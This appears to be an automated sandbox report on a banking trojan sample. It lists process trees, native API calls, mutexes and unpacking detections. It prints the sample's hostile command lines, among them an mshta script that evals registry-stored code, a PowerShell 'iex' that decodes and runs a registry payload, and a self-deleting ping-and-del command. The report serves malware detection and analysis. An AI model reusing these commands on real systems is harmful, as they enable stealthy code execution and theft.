Source: C:\Windows\System32\control.exe	Code function: 21_2_00A59AA8	21_2_00A59AA8
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A45AB4	21_2_00A45AB4
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A3AAB4	21_2_00A3AAB4
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A42A90	21_2_00A42A90
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A4DEE8	21_2_00A4DEE8
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A452D0	21_2_00A452D0
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A31638	21_2_00A31638
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A4220C	21_2_00A4220C
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A35A1C	21_2_00A35A1C
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A477A0	21_2_00A477A0
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A3CFF8	21_2_00A3CFF8
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A39FC4	21_2_00A39FC4
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A33764	21_2_00A33764
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A5137C	21_2_00A5137C
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A51B4C	21_2_00A51B4C
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D27548	31_2_000001B888D27548
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D259E4	31_2_000001B888D259E4
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D2137C	31_2_000001B888D2137C
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D177A0	31_2_000001B888D177A0
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D21B4C	31_2_000001B888D21B4C
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D03764	31_2_000001B888D03764
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D152D0	31_2_000001B888D152D0
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D1DEE8	31_2_000001B888D1DEE8
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D0847C	31_2_000001B888D0847C
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D09098	31_2_000001B888D09098
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D28448	31_2_000001B888D28448
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D11C44	31_2_000001B888D11C44
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D20468	31_2_000001B888D20468
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D0CFF8	31_2_000001B888D0CFF8
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D1C400	31_2_000001B888D1C400
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D14818	31_2_000001B888D14818
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D05420	31_2_000001B888D05420
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D09FC4	31_2_000001B888D09FC4
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D0C3E4	31_2_000001B888D0C3E4
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D065A8	31_2_000001B888D065A8
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D029B0	31_2_000001B888D029B0
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D291B0	31_2_000001B888D291B0
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D1993C	31_2_000001B888D1993C
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D23D68	31_2_000001B888D23D68
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D18974	31_2_000001B888D18974
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D12A90	31_2_000001B888D12A90
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D29AA8	31_2_000001B888D29AA8
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D0AAB4	31_2_000001B888D0AAB4
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D15AB4	31_2_000001B888D15AB4
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D01638	31_2_000001B888D01638
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D1220C	31_2_000001B888D1220C
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D05A1C	31_2_000001B888D05A1C
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D10DC8	31_2_000001B888D10DC8
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D1B1D0	31_2_000001B888D1B1D0
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D1CDC4	31_2_000001B888D1CDC4
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D3B5A4	31_2_000001B888D3B5A4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_037413FA	44_2_037413FA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0374B006	44_2_0374B006

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: FpYf5EGDO9.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FpYf5EGDO9.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: FpYf5EGDO9.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_00401703 NtMapViewOfSection,	0_2_00401703
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_00401C90 GetProcAddress,NtCreateSection,memset,	0_2_00401C90
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_004019A0 NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	0_2_004019A0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C45CD1 GetProcAddress,NtCreateSection,memset,	0_2_03C45CD1
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C49E79 NtMapViewOfSection,	0_2_03C49E79
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C49A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_03C49A0F
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C4B1E5 NtQueryVirtualMemory,	0_2_03C4B1E5
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A4B080 NtMapViewOfSection,	21_2_00A4B080
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A474E0 RtlAllocateHeap,NtQueryInformationProcess,	21_2_00A474E0
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A570F8 NtCreateSection,	21_2_00A570F8
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A48078 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	21_2_00A48078
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A48844 NtWriteVirtualMemory,	21_2_00A48844
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A43104 NtAllocateVirtualMemory,	21_2_00A43104
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A4B164 NtQueryInformationProcess,	21_2_00A4B164
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A3B964 NtReadVirtualMemory,	21_2_00A3B964
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A54200 NtQueryInformationToken,NtQueryInformationToken,NtClose,	21_2_00A54200
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A3C3E4 NtSetContextThread,NtUnmapViewOfSection,NtClose,	21_2_00A3C3E4
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A6B00B NtProtectVirtualMemory,NtProtectVirtualMemory,	21_2_00A6B00B
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D1B164 NtQueryInformationProcess,	31_2_000001B888D1B164
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D24200 NtQueryInformationToken,NtQueryInformationToken,NtClose,	31_2_000001B888D24200
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D3B00B NtProtectVirtualMemory,NtProtectVirtualMemory,	31_2_000001B888D3B00B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_037407E8 NtQueryInformationProcess,	44_2_037407E8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0373B347 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	44_2_0373B347
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0374FBD1 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	44_2_0374FBD1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0373A63D memset,NtQueryInformationProcess,	44_2_0373A63D

Source: FpYf5EGDO9.exe, 00000000.00000003.457741081.0000000005EC4000.00000004.00000001.sdmp

Binary or memory string: OriginalFilenamentdll.dllj% vs FpYf5EGDO9.exe

Source: FpYf5EGDO9.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20211123

Jump to behavior

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winEXE@33/20@11/7

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: FpYf5EGDO9.exe

Virustotal: Detection: 46%

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FpYf5EGDO9.exe "C:\Users\user\Desktop\FpYf5EGDO9.exe"
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\2227.bi1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\2227.bi1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP"	Jump to behavior
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\2227.bi1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\2227.bi1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3sr4b0q.5pk.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_03C48F1B CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_03C48F1B

Source: C:\Windows\System32\control.exe

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{CC8B2523-BB54-DEC2-A5C0-1FF2A9F4C346}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_01
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{149D3F5E-63E5-660B-8D88-47FA113C6BCE}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{ECAECFE4-5BDD-FE72-45E0-BF1249146366}
Source: C:\Windows\SysWOW64\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\{7CCD0A5F-ABCA-0E60-1570-0F2219A4B376}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_01

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Command line argument: pemahu	0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Command line argument: Regefiri	0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Command line argument: Xegixaze	0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Command line argument: \H	0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Command line argument: zijiwe	0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Command line argument: "Y?	0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Command line argument: mecevituxe	0_2_0042F2F0

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: FpYf5EGDO9.exe

Static PE information: More than 200 imports for KERNEL32.dll

Source: FpYf5EGDO9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: FpYf5EGDO9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: FpYf5EGDO9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: FpYf5EGDO9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: FpYf5EGDO9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: FpYf5EGDO9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: FpYf5EGDO9.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdb source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source:	Binary string: SC:\gapajoxo-luhibomihi za.pdbP+CD source: FpYf5EGDO9.exe
Source:	Binary string: C:\gapajoxo-luhibomihi za.pdb source: FpYf5EGDO9.exe
Source:	Binary string: ntdll.pdb source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdb source: powershell.exe, 0000000E.00000002.590639322.000001A9845B8000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Unpacked PE file: 0.2.FpYf5EGDO9.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Unpacked PE file: 0.2.FpYf5EGDO9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;

Suspicious powershell command line found

Show sources

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))			Jump to behavior

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C4E9AC push 0B565A71h; ret	0_2_03C4E9B1
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C4AFAF push ecx; ret	0_2_03C4AFBF
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C4AC00 push ecx; ret	0_2_03C4AC09
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C4E62F push edi; retf	0_2_03C4E630
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_0042EA80 push ecx; mov dword ptr [esp], 00000000h	0_2_0042EA81
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_021C5A54 push ds; ret	0_2_021C5A55
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_021BF050 push ebx; retf	0_2_021BF062
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_021BED5D push edx; iretd	0_2_021BED94
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_021C3D79 push 12BFE4EFh; ret	0_2_021C3D7E
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_021BFF72 push esp; iretd	0_2_021BFF83
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_021BE769 push esi; iretd	0_2_021BE76A
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_021C2BBF push es; iretd	0_2_021C2BC2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0374FECD push ecx; mov dword ptr [esp], 00000002h	44_2_0374FECE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_03752D7B push ecx; ret	44_2_03752D8B

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_00401264 LoadLibraryA,GetProcAddress,

0_2_00401264

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline	Jump to behavior

Source: initial sample

Static PE information: section name: .text entropy: 7.04723316599

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\i1aaekli.dll			Jump to dropped file
